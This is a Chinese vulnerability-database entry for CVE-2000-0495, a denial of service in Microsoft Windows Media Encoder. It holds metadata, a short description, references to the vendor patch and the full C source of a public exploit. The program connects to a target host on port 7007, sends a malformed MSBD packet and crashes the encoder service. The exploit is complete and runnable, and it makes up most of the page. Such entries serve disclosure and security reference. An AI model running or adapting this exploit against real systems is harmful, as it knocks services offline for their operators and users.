Microsoft Media Service DoS漏洞

Microsoft Media Service DoS漏洞

漏洞ID 1105861 漏洞类型 其他
发布时间 2000-05-31 更新时间 2005-10-12
图片[1]-Microsoft Media Service DoS漏洞-安全小百科CVE编号 CVE-2000-0495
图片[2]-Microsoft Media Service DoS漏洞-安全小百科CNNVD-ID CNNVD-200005-106
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19974
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-106
|漏洞详情
MicrosoftWindowsMediaEncoder存在漏洞。远程攻击者借助畸形请求导致拒绝服务,又称为”MalformedWindowsMediaEncoderRequest”漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/1282/info

Windows Media Encoder is part of Windows Media Services. It's purpose is to convert content into a suitable format for video or audio streaming through the Media Services.

If a specially malformed request is sent to the Windows Media Encoder it could cause the service to crash. The service would need to be restarted in order to regain normal functionality.

/*
 *
 * Media Streaming Broadcast Distribution (MSBD)
 * Denial of Service Attack
 *
 * (C) 2000 Kit Knox <[email protected]> - Public Release: 05/31/00
 *
 * Causes the Windows Media Encoder to crash with a "Runtime Error!"
 *
 * "NSREX caused an invalid page fault in module MFC42.DLL at 0177:5f4012a1".
 *
 * Tested on version 4.1.0.3920 file "NsRex.exe" 998KB 1/11/00.
 *
 * Official Microsoft patch is available :
 *
 * http://www.microsoft.com/technet/security/bulletin/ms00-038.asp
 *
 * Thanks to Microsoft and the WMT group for their prompt attention to this
 * matter.
 *
 */

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

char bogus_msbd_packet1[] = {
0x4d, 0x53, 0x42, 0x20, 0x06, 0x01, 0x07, 0x00, 0x24, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4e, 0x00,
0x65, 0x00, 0x74, 0x00, 0x00, 0x50, 0x53, 0x00, 0x68, 0x00, 0x6f, 0x00,
0x77, 0x00, 0x00, 0x00
};

int sock;
 
int main(int argc, char *argv[]) {
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  
  if (argc != 2) {
    fprintf(stderr, "usage: %s <host/ip>n", argv[0]);
    return(-1);
  }
  
  sock = socket ( AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons(7007);
  he = gethostbyname (argv[1]);
  if (!he) {
    if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
      return(-1);
  } else {
    bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
  }
  if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    fprintf(stderr, "Fatal Error: Can't connect to Windows Media Encoder.n");
    return(-1);
  }
  write(sock, bogus_msbd_packet1, sizeof(bogus_msbd_packet1));
  for (;;) {
    read(sock, buf, sizeof(buf));
  }
}
|参考资料

来源:XF
名称:ms-malformed-media-dos
链接:http://xforce.iss.net/static/4585.php
来源:MS
名称:MS00-038
链接:http://www.microsoft.com/technet/security/bulletin/ms00-038.asp
来源:BID
名称:1282
链接:http://www.securityfocus.com/bid/1282

相关推荐: Avaya Argent Office更改等待音乐漏洞

Avaya Argent Office更改等待音乐漏洞 漏洞ID 1205473 漏洞类型 未知 发布时间 2001-08-07 更新时间 2001-08-07 CVE编号 CVE-2001-1261 CNNVD-ID CNNVD-200108-034 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享